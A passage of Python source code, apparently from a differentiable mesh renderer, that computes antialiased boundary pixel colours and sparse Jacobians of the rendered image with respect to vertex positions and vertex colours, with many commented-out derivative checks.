db2dp2wrt = db2dp2wrtpart1 + db2dp2wrtpart2
dp0 = np.concatenate([db0dp0wrt[:, None, :], db1dp0wrt[:, None, :], db2dp0wrt[:, None, :]], axis=1)
dp1 = np.concatenate([db0dp1wrt[:, None, :], db1dp1wrt[:, None, :], db2dp1wrt[:, None, :]], axis=1)
dp2 = np.concatenate([db0dp2wrt[:, None, :], db1dp2wrt[:, None, :], db2dp2wrt[:, None, :]], axis=1)
#
dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# If dealing with degenerate triangles, ignore that gradient.
# dp[nt_mag <= 1e-15] = 0
dp = dp[None, :]
nFaces = len(faces)
# visTriVC = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc[vc > 1] = 1
vc[vc < 0] = 0
visTriVC = vc
dxdp = np.concatenate([dxdp_0[:, None, :], dxdp_1[:, None, :], dxdp_2[:, None, :]], axis=1)
dxdp = dxdp[None, :, None]
# dbvc = np.sum(dp * visTriVC, 2)
# dbvc = dp * visTriVC * t_area[None, :, None, None, None]
dbvc = dp * visTriVC
didp = np.sum(dbvc[:, :, :, :, :, None] * dxdp, 4).sum(2)
# output should be shape: VC x Ninput x Tri Points x UV
# drb0p0 # db0dp0wrt
# drb0p1 # db0dp1wrt
# drb0p2 # db0dp2wrt
# drb1p0 # db1dp0wrt
# drb1p1 # db1dp1wrt
# drb1p2 # db1dp2wrt
# drb2p0 # db2dp0wrt
# drb2p1 # db2dp1wrt
# drb2p2 # db2dp2wrt
return didp
def compute_image(self, visible, visibility, f):
"""Construct a sparse jacobian that relates 2D projected vertex positions
(in the columns) to pixel values (in the rows). This can be done
in two steps."""
boundaryImage = self.boundarybool_image.astype(np.bool) & (visibility != 4294967295)
zerosIm = np.ones(self.boundarybool_image.shape).astype(np.bool)
edge_visibility = self.boundaryid_image
nsamples = self.nsamples
if np.any(boundaryImage):
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape(
[nsamples, -1, 2])
# sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:,(zerosIm*boundaryImage).ravel().astype(np.bool),:].reshape([nsamples, -1, 3])
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape([nsamples, -1, 3])
boundaryFaces = visibility[(boundaryImage) & (visibility != 4294967295)]
nBndFaces = len(boundaryFaces)
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2, 2])
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1, 1, 1])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(np.bool)].reshape([nsamples, -1]) - 1
# if self.debug:
# import pdb; pdb.set_trace()
faces = f[sampleFaces].ravel()
vertsPerFaceProjBnd = self.camera.r[faces].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:, 0, :], np.ones([nv, 1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:, 1, :], np.ones([nv, 1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:, 2, :], np.ones([nv, 1])]
t_area_bnd = np.abs(np.linalg.det(np.concatenate([p0_proj[:, None], p1_proj[:, None], p2_proj[:, None]], axis=1)) * 0.5)
t_area_bnd[t_area_bnd > 1] = 1
# Trick to cap to 1 while keeping gradients.
p1 = vertsProjBndSamples.reshape([-1,2,2])[:, 0, :]
p2 = vertsProjBndSamples.reshape([-1,2,2])[:, 1, :]
p = sampleV.reshape([-1,2])
l = (p2 - p1)
linedist = np.sqrt((np.sum(l ** 2, axis=1)))[:, None]
self.linedist = linedist
lnorm = l / linedist
self.lnorm = lnorm
v1 = p - p1
self.v1 = v1
d = v1[:, 0] * lnorm[:, 0] + v1[:, 1] * lnorm[:, 1]
self.d = d
intersectPoint = p1 + d[:, None] * lnorm
v2 = p - p2
self.v2 = v2
l12 = (p1 - p2)
linedist12 = np.sqrt((np.sum(l12 ** 2, axis=1)))[:, None]
lnorm12 = l12 / linedist12
d2 = v2[:, 0] * lnorm12[:, 0] + v2[:, 1] * lnorm12[:, 1]
nonIntersect = (d2 < 0) | (d < 0)
self.nonIntersect = nonIntersect
argminDistNonIntersect = np.argmin(np.c_[d[nonIntersect], d2[nonIntersect]], 1)
self.argminDistNonIntersect = argminDistNonIntersect
intersectPoint[nonIntersect] = vertsProjBndSamples.reshape([-1,2,2])[nonIntersect][np.arange(nonIntersect.sum()), argminDistNonIntersect]
lineToPoint = (p - intersectPoint)
n = lineToPoint
dist = np.sqrt((np.sum(lineToPoint ** 2, axis=1)))[:, None]
n_norm = lineToPoint / dist
self.n_norm = n_norm
self.dist = dist
d_final = dist.squeeze()
# max_nx_ny = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
# d_final = d_final / max_nx_ny
d_final = d_final
# invViewMtx = np.linalg.inv(np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])])
# #
# camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
# # invCamMtx = np.r_[np.c_[np.linalg.inv(self.camera.camera_mtx), np.array([0,0,0])], np.array([[0, 0, 0, 1]])]
#
# view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
# verticesBndSamples = np.concatenate([verticesBndSamples.reshape([-1, 3]), np.ones([verticesBndSamples.size // 3, 1])], axis=1)
# projVerticesBndOutside = (camMtx.dot(view_mtx)).dot(verticesBndSamples.T).T[:, :3].reshape([-1, 2, 3])
# projVerticesBndDir = projVerticesBndOutside[:, 1, :] - projVerticesBndOutside[:, 0, :]
# projVerticesBndDir = projVerticesBndDir / np.sqrt((np.sum(projVerticesBndDir ** 2, 1)))[:, None]
# dproj = (intersectPoint[:, 0] * projVerticesBndOutside[:, 0, 2] - projVerticesBndOutside[:, 0, 0]) / (projVerticesBndDir[:, 0] - projVerticesBndDir[:, 2] * intersectPoint[:, 0])
# # Code to check computation that dproj == dprojy
# # dproj_y = (intersectPoint[:,1]* projVerticesBndOutside[:,0,2] - projVerticesBndOutside[:,0,1]) / (projVerticesBndDir[:,1] - projVerticesBndDir[:,2]*intersectPoint[:,1])
#
# projPoint = projVerticesBndOutside[:, 0, :][:, :] + dproj[:, None] * projVerticesBndDir[:, :]
#
# projPointVec4 = np.concatenate([projPoint, np.ones([projPoint.shape[0], 1])], axis=1)
# viewPointIntersect = (invViewMtx.dot(np.linalg.inv(camMtx)).dot(projPointVec4.T.reshape([4, -1])).reshape([4, -1])).T[:, :3]
#
# barycentricVertsDistIntesect = np.linalg.norm(viewPointIntersect - verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 0, :], axis=1)
# barycentricVertsDistIntesect2 = np.linalg.norm(viewPointIntersect - verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 1, :], axis=1)
# # Code to check barycentricVertsDistIntesect + barycentricVertsDistIntesect2 = barycentricVertsDistEdge
# barycentricVertsDistEdge = np.linalg.norm(
# verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 0, :] - verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 1, :], axis=1)
#
# nonIntersect = np.abs(barycentricVertsDistIntesect + barycentricVertsDistIntesect2 - barycentricVertsDistEdge) > 1e-4
# argminDistNonIntersect = np.argmin(np.c_[barycentricVertsDistIntesect[nonIntersect], barycentricVertsDistIntesect2[nonIntersect]], 1)
#
# self.viewPointIntersect = viewPointIntersect
# self.viewPointIntersect[nonIntersect] = verticesBndSamples.reshape([-1, 2, 4])[nonIntersect, :, 0:3][np.arange(nonIntersect.sum()),
# argminDistNonIntersect, :]
d_finalNP = d_final.copy()
self.d_final = d_finalNP
self.t_area_bnd = t_area_bnd
areaWeights = np.zeros([nsamples, nBndFaces])
areaWeights = t_area_bnd.reshape([nsamples, nBndFaces])
areaWeightsTotal = areaWeights.sum(0)
# areaWeightsTotal[areaWeightsTotal < 1] = 1
self.areaWeights = areaWeights
self.areaWeightsTotal = areaWeightsTotal
finalColorBnd = np.ones([self.nsamples, boundaryFaces.size, 3])
self.d_final_total = d_finalNP.reshape([self.nsamples, -1,1]).sum(0)
# if self.imageGT is not None:
finalColorBnd = sampleColors * d_finalNP.reshape([self.nsamples, -1,1]) / (self.d_final_total.reshape([1, -1,1]))
# finalColorBnd = areaWeights[:,:,None] * sampleColors * d_finalNP.reshape([self.nsamples, -1,1]) / (self.d_final_total.reshape([1, -1,1]) * areaWeightsTotal[None,:,None])
self.finalColorBnd = finalColorBnd
# else:
# finalColorBnd = sampleColors
bndColorsImage = np.zeros_like(self.color_image)
bndColorsImage[(zerosIm * boundaryImage), :] = np.sum(finalColorBnd, axis=0)
finalColorImageBnd = bndColorsImage
if self.imageGT is not None:
bndColorsResiduals = np.zeros_like(self.color_image)
self.sampleResiduals = (sampleColors - self.imageGT.r[(zerosIm * boundaryImage),:][None,:])
self.sampleResidualsWeighted = self.sampleResiduals**2 * d_finalNP.reshape([self.nsamples, -1,1]) / self.d_final_total.reshape([1, -1,1])
bndColorsResiduals[(zerosIm * boundaryImage), :] = np.sum(self.sampleResidualsWeighted,0)
if np.any(boundaryImage):
finalColor = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * finalColorImageBnd
if self.imageGT is not None:
self.residuals = (self.color_image - self.imageGT.r)
errors = self.residuals**2
finalResidual = (1 - boundaryImage)[:, :, None] * errors + boundaryImage[:, :, None] * bndColorsResiduals
else:
finalColor = self.color_image
if self.imageGT is not None:
finalResidual = (self.color_image - self.imageGT.r)**2
if self.imageGT is None:
finalResidual = None
finalColor[finalColor > 1] = 1
finalColor[finalColor < 0] = 0
return finalColor, finalResidual
def compute_derivatives_verts(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
# xdiff = dEdx
# ydiff = dEdy
nVisF = len(visibility.ravel()[visible])
# projVertices = self.camera.r[f[visibility.ravel()[visible]].ravel()].reshape([nVisF,3, 2])
boundaryImage = self.boundarybool_image.astype(np.bool) & (visibility != 4294967295)
rangeIm = np.arange(self.boundarybool_image.size)
zerosIm = np.ones(self.boundarybool_image.shape).astype(np.bool)
edge_visibility = self.boundaryid_image
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2, 2])
nsamples = self.nsamples
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape(
[nsamples, -1, 2])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(np.bool)].reshape([nsamples, -1]) - 1
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage) & (visibility != 4294967295)]
if np.any(boundaryImage):
n_norm = self.n_norm
dist = self.dist
linedist = self.linedist
d = self.d
v1 = self.v1
lnorm = self.lnorm
d_final = self.d_final
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
# vertsProjBnd[None, :] - sampleV[:,None,:]
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1, 1, 1])
# Computing gradients:
# A multisampled pixel color is given by: w R + (1-w) R' thus:
# 1 derivatives samples outside wrt v 1: (dw * (svc) - dw (bar'*vc') )/ nsamples for face sample
# 2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
# 3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
# 4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
# 5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
# 6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
# 7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
# for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
# Finally, stack data, and IJ of nonbnd with bnd on both dwrt_v and dwrt_vc.
######## 1 derivatives samples outside wrt v 1: (dw * (bar*vc) - dw (bar'*vc') )/ nsamples for face sample
# # #Chumpy autodiff code to check derivatives here:
# chEdgeVerts = ch.Ch(vertsProjBndSamples.reshape([-1,2,2]))
#
# chEdgeVerts1 = chEdgeVerts[:,0,:]
# chEdgeVerts2 = chEdgeVerts[:,1,:]
#
# chSampleVerts = ch.Ch(sampleV.reshape([-1,2]))
# # c1 = (chEdgeVerts1 - chSampleVerts)
# # c2 = (chEdgeVerts2 - chSampleVerts)
# # n = (chEdgeVerts2 - chEdgeVerts1)
#
# #Code to check computation of distance below
# # d2 = ch.abs(c1[:,:,0]*c2[:,:,1] - c1[:,:,1]*c2[:,:,0]) / ch.sqrt((ch.sum(n**2,2)))
# # # np_mat = ch.dot(ch.array([[0,-1],[1,0]]), n)
# # np_mat2 = -ch.concatenate([-n[:,:,1][:,:,None], n[:,:,0][:,:,None]],2)
# # np_vec2 = np_mat2 / ch.sqrt((ch.sum(np_mat2**2,2)))[:,:,None]
# # d2 = d2 / ch.maximum(ch.abs(np_vec2[:,:,0]),ch.abs(np_vec2[:,:,1]))
#
# chl = (chEdgeVerts2 - chEdgeVerts1)
# chlinedist = ch.sqrt((ch.sum(chl**2,axis=1)))[:,None]
# chlnorm = chl/chlinedist
#
# chv1 = chSampleVerts - chEdgeVerts1
#
# chd = chv1[:,0]* chlnorm[:,0] + chv1[:,1]* chlnorm[:,1]
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
# # intersectPointDist1 = intersectPoint - chEdgeVerts1
# # intersectPointDist2 = intersectPoint - chEdgeVerts2
# # Code to check computation of distances below:
# # lengthIntersectToPoint1 = np.linalg.norm(intersectPointDist1.r,axis=1)
# # lengthIntersectToPoint2 = np.linalg.norm(intersectPointDist2.r,axis=1)
#
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
#
# chlineToPoint = (chSampleVerts - chintersectPoint)
# chn_norm = chlineToPoint / ch.sqrt((ch.sum(chlineToPoint ** 2, axis=1)))[:, None]
#
# chdist = chlineToPoint[:,0]*chn_norm[:,0] + chlineToPoint[:,1]*chn_norm[:,1]
#
# # d_final_ch = chdist / ch.maximum(ch.abs(chn_norm[:, 0]), ch.abs(chn_norm[:, 1]))
# d_final_ch = chdist
#
# d_final_ch_weights = sampleColors * (d_final_ch.reshape([self.nsamples, -1]) / ch.sum(d_final_ch.reshape([self.nsamples, -1]), 0))[:,:,None]
#
# d_final_outside = d_final_ch.ravel()
# dwdv = d_final_outside.dr_wrt(chEdgeVerts1)
# rows = np.tile(np.arange(d_final_outside.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_outside.shape[0] * 2)
#
# dwdv_r_v1 = np.array(dwdv[rows, cols]).reshape([-1, 2])
#
# dwdv = d_final_outside.dr_wrt(chEdgeVerts2)
# rows = np.tile(np.arange(d_final_ch.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_ch.shape[0] * 2)
#
# dwdv_r_v2 = np.array(dwdv[rows, cols]).reshape([-1, 2])
nonIntersect = self.nonIntersect
argminDistNonIntersect = self.argminDistNonIntersect
# max_dx_dy = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
d_final_np = dist
# d_final_np = dist / max_dx_dy
ident = np.identity(2)
ident = np.tile(ident[None, :], [len(d_final_np), 1, 1])
dlnorm = (ident - np.einsum('ij,ik->ijk', lnorm, lnorm)) / linedist[:, None]
dl_normdp1 = np.einsum('ijk,ikl->ijl', dlnorm, -ident)
dl_normdp2 = np.einsum('ijk,ikl->ijl', dlnorm, ident)
dv1dp1 = -ident
dv1dp2 = 0
dddp1 = np.einsum('ijk,ij->ik', dv1dp1, lnorm) + np.einsum('ij,ijl->il', v1, dl_normdp1)
dddp2 = 0 + np.einsum('ij,ijl->il', v1, dl_normdp2)
dipdp1 = ident + (dddp1[:, None, :] * lnorm[:, :, None]) + d[:, None, None] * dl_normdp1
dipdp2 = (dddp2[:, None, :] * lnorm[:, :, None]) + d[:, None, None] * dl_normdp2
#good up to here.
dndp1 = -dipdp1
dndp2 = -dipdp2
dn_norm = (ident - np.einsum('ij,ik->ijk', n_norm, n_norm)) / dist[:, None]
# dn_normdp1 = np.einsum('ijk,ikl->ijl', dn_norm, dndp1)
# dn_normdp2 = np.einsum('ijk,ikl->ijl', dn_norm, dndp2)
ddistdp1 = np.einsum('ij,ijl->il', n_norm, dndp1)
ddistdp2 = np.einsum('ij,ijl->il', n_norm, dndp2)
# argmax_nx_ny = np.argmax(np.abs(n_norm), axis=1)
# dmax_nx_ny_p1 = np.sign(n_norm)[np.arange(len(n_norm)), argmax_nx_ny][:, None] * dn_normdp1[np.arange(len(dn_normdp1)), argmax_nx_ny]
# dmax_nx_ny_p2 = np.sign(n_norm)[np.arange(len(n_norm)), argmax_nx_ny][:, None] * dn_normdp2[np.arange(len(dn_normdp2)), argmax_nx_ny]
# dd_final_dp1 = -1. / max_dx_dy[:, None] ** 2 * dmax_nx_ny_p1 * dist + 1. / max_dx_dy[:, None] * ddistdp1
# dd_final_dp2 = -1. / max_dx_dy[:, None] ** 2 * dmax_nx_ny_p2 * dist + 1. / max_dx_dy[:, None] * ddistdp2
dd_final_dp1 = ddistdp1
dd_final_dp2 = ddistdp2
# For those non intersecting points straight to the edge:
v1 = self.v1[nonIntersect][argminDistNonIntersect == 0]
v1_norm = v1 / np.sqrt((np.sum(v1 ** 2, axis=1)))[:, None]
dd_final_dp1_nonintersect = -v1_norm
v2 = self.v2[nonIntersect][argminDistNonIntersect == 1]
v2_norm = v2 / np.sqrt((np.sum(v2 ** 2, axis=1)))[:, None]
dd_final_dp2_nonintersect = -v2_norm
dd_final_dp1[nonIntersect][argminDistNonIntersect == 0] = dd_final_dp1_nonintersect
dd_final_dp1[nonIntersect][argminDistNonIntersect == 1] = 0
dd_final_dp2[nonIntersect][argminDistNonIntersect == 1] = dd_final_dp2_nonintersect
dd_final_dp2[nonIntersect][argminDistNonIntersect == 0] = 0
dd_final_dp1_weighted_part1 = -self.d_final[:,None]* np.tile(dd_final_dp1.reshape([self.nsamples, -1, 2]).sum(0)[None,:,:],[self.nsamples,1,1]).reshape([-1, 2])/(np.tile(self.d_final_total[None,:], [self.nsamples, 1,1]).reshape([-1,1])**2)
dd_final_dp1_weighted_part2 = dd_final_dp1 / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1])
dd_final_dp1_weighted = dd_final_dp1_weighted_part1 + dd_final_dp1_weighted_part2
dd_final_dp2_weighted_part1 = -self.d_final[:,None]*np.tile(dd_final_dp2.reshape([self.nsamples, -1, 2]).sum(0)[None,:,:],[self.nsamples,1,1]).reshape([-1, 2])/(np.tile(self.d_final_total[None,:], [self.nsamples, 1,1]).reshape([-1,1])**2)
dd_final_dp2_weighted_part2 = dd_final_dp2 / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1])
dd_final_dp2_weighted = dd_final_dp2_weighted_part1 + dd_final_dp2_weighted_part2
if self.imageGT is None:
dImage_wrt_outside_v1 = sampleColors.reshape([-1,3,1]) * dd_final_dp1_weighted[:, None, :]
dImage_wrt_outside_v2 = sampleColors.reshape([-1,3,1]) * dd_final_dp2_weighted[:, None, :]
else:
dImage_wrt_outside_v1 = self.sampleResiduals.reshape([-1,3,1])**2 * dd_final_dp1_weighted[:, None, :]
dImage_wrt_outside_v2 = self.sampleResiduals.reshape([-1,3,1])**2 * dd_final_dp2_weighted[:, None, :]
# sampleV
# z = dd_final_dp1.reshape([8, -1, 2])
# eq = np.array([np.all(np.sign(z[:, i, :]) == -1) or np.all(np.sign(z[:, i, :]) == 1) for i in range(z.shape[1])])
# dist_ns = dist.reshape([8,-1])
# rightV = sampleV[0, :, 0] > np.max(sampleV[0, :, :], 0)[0] - 1
# dist_ns[0, rightV]
# dImage_wrt_outside_v1.reshape([8, -1, 3, 2])[0, rightV,:]
# d_final_ch_weights
# self.finalColorBnd
### Derivatives wrt V:
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])
IS = np.tile(col(pixels), (1, 2 * 2)).ravel()
faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()
faces = np.tile(faces.reshape([1, -1, 2]), [self.nsamples, 1, 1]).ravel()
JS = col(faces)
JS = np.hstack((JS * 2, JS * 2 + 1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS * n_channels + i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data1 = dImage_wrt_outside_v1.transpose([1, 0, 2])
data2 = dImage_wrt_outside_v2.transpose([1, 0, 2])
data = np.concatenate([data1[:, :, None, :], data2[:, :, None, :]], 2)
data = data.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bnd = sp.csc_matrix((data, ij), shape=(image_width * image_height * n_channels, num_verts * 2))
######## 2 derivatives samples wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
verticesBnd = self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3])
sampleBarycentricBar = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool),
:].reshape([-1, 3, 1])
verts = np.sum(self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3, 3]) * sampleBarycentricBar, axis=1)
dImage_wrt_bar_v = self.barycentricDerivatives(verticesBnd, f[sampleFaces.ravel()], verts).swapaxes(0, 1)
if self.imageGT is None:
# dImage_wrt_bar_v = dImage_wrt_bar_v * d_final[:, None, None, None] * self.t_area_bnd[:, None, None, None] / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
dImage_wrt_bar_v = dImage_wrt_bar_v * d_final[:, None, None, None] / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
# areaTotal = np.tile(self.areaWeightsTotal[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
# d_final_total = np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
# dImage_wrt_bar_v = self.areaWeights.reshape([-1,1,1,1]) * dImage_wrt_bar_v * d_final[:, None, None, None] / (areaTotal*d_final_total)
else:
dImage_wrt_bar_v = 2*self.sampleResiduals.reshape([-1,3])[:,:,None,None] * dImage_wrt_bar_v * d_final[:, None, None, None] * self.t_area_bnd[:, None, None, None] / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
### Derivatives wrt V: 2 derivatives samples wrt v bar: (w * (dbar*vc) )/ nsamples for faces sample
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])
IS = np.tile(col(pixels), (1, 2 * f.shape[1])).ravel()
faces = f[sampleFaces].ravel()
JS = col(faces)
JS = np.hstack((JS * 2, JS * 2 + 1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS * n_channels + i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = np.transpose(dImage_wrt_bar_v, [1, 0, 2, 3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bnd_bar = sp.csc_matrix((data, ij), shape=(image_width * image_height * n_channels, num_verts * 2))
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
verticesNonBnd = self.v.r[f[nonBoundaryFaces].ravel()]
vertsPerFaceProjBnd = self.camera.r[f[nonBoundaryFaces].ravel()].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:, 0, :], np.ones([nv, 1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:, 1, :], np.ones([nv, 1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:, 2, :], np.ones([nv, 1])]
t_area_nonbnd = np.abs(np.linalg.det(np.concatenate([p0_proj[:, None], p1_proj[:, None], p2_proj[:, None]], axis=1)) * 0.5)
t_area_nonbnd[t_area_nonbnd > 1] = 1
bc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
verts = np.sum(self.v.r[f[nonBoundaryFaces.ravel()].ravel()].reshape([-1, 3, 3]) * bc[:, :, None], axis=1)
didp = self.barycentricDerivatives(verticesNonBnd, f[nonBoundaryFaces.ravel()], verts)
if self.imageGT is None:
# didp = didp * t_area_nonbnd[None, :, None, None]
didp = didp
else:
didp = 2 * self.residuals[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3)).T[:,:,None,None] * didp * t_area_nonbnd[None, :, None, None]
n_channels = np.atleast_3d(observed).shape[2]
####### 2: Take the data and copy the corresponding dxs and dys to these new pixels.
### Derivatives wrt V:
pixels = np.where(((~boundaryImage) & (visibility != 4294967295)).ravel())[0]
IS = np.tile(col(pixels), (1, 2 * f.shape[1])).ravel()
JS = col(f[nonBoundaryFaces].ravel())
JS = np.hstack((JS * 2, JS * 2 + 1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS * n_channels + i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = didp.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_nonbnd = sp.csc_matrix((data, ij), shape=(image_width * image_height * n_channels, num_verts * 2))
if np.any(boundaryImage):
result_wrt_verts = result_wrt_verts_bnd + result_wrt_verts_bnd_bar + result_wrt_verts_nonbnd
else:
result_wrt_verts = result_wrt_verts_nonbnd
return result_wrt_verts
def compute_derivatives_vc(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
d_final = self.d_final
boundaryImage = self.boundarybool_image.astype(np.bool) & (visibility != 4294967295)
zerosIm = np.ones(self.boundarybool_image.shape).astype(np.bool)
nsamples = self.nsamples
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(np.bool)].reshape([nsamples, -1]) - 1
sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool),
:].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage) & (visibility != 4294967295)]
if np.any(boundaryImage):
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
# Computing gradients:
# A multisampled pixel color is given by: w R + (1-w) R' thus:
# 1 derivatives samples wrt v 1: (dw * (svc) - dw (bar'*vc') )/ nsamples for face sample
# 2 derivatives samples wrt v bar: (w * (dbar*vc) )/ nsamples for faces sample
# 4 derivatives samples wrt vc : (w * (bar) )/ nsamples for faces sample
# for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
####### 4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
if self.imageGT is None:
dImage_wrt_bnd_vc = d_final[:, None] * sampleBarycentric.reshape([-1,3]) / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1,1])
else:
dImage_wrt_bnd_vc = d_final[:, None] * sampleBarycentric.reshape([-1,3]) / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1,1])
dImage_wrt_bnd_vc = 2 * self.sampleResiduals.reshape([-1,3]).T[:,:,None] * dImage_wrt_bnd_vc[None,:]
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])
IS = np.tile(col(pixels), (1, 3)).ravel()
faces = f[sampleFaces].ravel()
JS = col(faces)
data = dImage_wrt_bnd_vc.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
if self.imageGT is None:
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_bnd = result
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.where(((~boundaryImage) & (visibility != 4294967295)).ravel())[0]
IS = np.tile(col(pixels), (1, 3)).ravel()
JS = col(f[nonBoundaryFaces].ravel())
if self.imageGT is None:
dImage_wrt_nonbnd_vc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
else:
dImage_wrt_nonbnd_vc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
dImage_wrt_nonbnd_vc = 2* self.residuals[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3)).T[:,:,None] * dImage_wrt_nonbnd_vc[None,:]
data = np.asarray(dImage_wrt_nonbnd_vc, order='C').ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
